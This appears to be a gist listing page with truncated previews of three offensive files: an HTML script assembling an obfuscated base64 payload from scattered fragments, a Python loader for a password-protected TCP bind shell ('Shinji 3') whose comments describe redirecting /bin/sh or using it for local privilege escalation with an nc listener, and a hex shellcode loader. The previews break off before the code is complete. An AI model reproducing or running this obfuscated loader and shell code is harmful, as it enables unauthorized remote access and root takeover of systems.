This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><script>/*. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . */ | |
ci="nVuY3Rpb24gZ";io="O319ZCgpOw==";jk="jMmhwYm1wcE1";/* . */mm="lKC0tXzB4OW"; | |
jw="VuY3Rpb24oX";og="yIF8weDVlNT";/*. . . . . . . . . . . .*/ps="GNITTZMeTly"; | |
cn="1cm4gXzB4Mm";d5="MHhjZWRkKCcw";/*. . . . . . . . . . . */df="MHgyNjQ1NDV"; | |
re="HgyNjQ1NDVbJ";rm="vbihfMHgyODQ";/*. . */k1="NlZGQoJzB4M";rp="zB4MTE0ZDEw"; | |
rv="icpXTtfMHgx";/*. . . . . . . . . . . .*/ij="E0PV8weGVkZ";k5="xfMHhjZWRkK"; | |
k7="NTA3MCkrYXR";/* . . */k8="I3YjAzW18weG";k9="HgyODQ2MjE9";we="ihfMHg5ZTM0"; | |
wh="ZD1mdW5jdGl";/*. . .*/ag="XIgXzB4Y2Vk";sn="NjIxXTtyZXR";ww="8weDExNGQxMD"; | |
k6="Cgpe3ZhciBf";/* . . .*/xz="UzNDYxKXtfM";zz="2MjEsXzB4NT";g9="BjMzhkKXtfM"; | |
tg="1mdW5jdGlvb";/*. . . . . . . . . . . */tk="h2YXIgXzB4M";so="IgXzB4MmZmOG"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import binascii, subprocess | |
###################################################### | |
# Shinji 3 is a proof of concept password protected # | |
# TCP Bind Shell binary. This one only works on # | |
# localhost, but you could modify to send /bin/sh # | |
# wherev, or use for local priv esc (: # | |
# # | |
# First create a listener $ nc -lvp 4444 # | |
# Then run the loader + binary # | |
# Then type the password 'ayy!' to become root. # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import binascii | |
import subprocess | |
t = [ "0000","005f","0100","015f","0200", | |
"0201","0300","0400","0500","056a", | |
"0600","0800","0853","0900","0d00", | |
"1000","1100","1400","1800","1900", | |
"1b00","2000","2100","2900","2e73", | |
"2e74","2f62","2f73","31c0","3800", | |
"3801","3b0f","3e00","4000","4831", |
NewerOlder